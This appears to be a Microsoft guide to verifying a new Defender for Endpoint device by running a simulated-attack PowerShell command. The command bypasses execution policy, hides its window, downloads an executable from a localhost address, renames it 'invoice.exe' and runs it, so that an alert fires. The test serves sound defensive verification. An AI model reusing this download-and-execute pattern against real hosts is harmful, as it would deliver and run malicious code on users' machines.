Run a detection test on a newly onboarded Microsoft Defender for Endpoint device

Applies to:

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Run the following PowerShell script on a newly onboarded device to verify that it is properly reporting to the Defender for Endpoint service.

  1. Create a folder: 'C:\test-MDATP-test'.

  2. Open an elevated command-line prompt on the device and run the script:

    1. Go to Start and type cmd.

    2. Right-click Command Prompt and select Run as administrator.

      Windows Start menu pointing to Run as administrator

  3. At the prompt, copy and run the following command:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded device in approximately 10 minutes.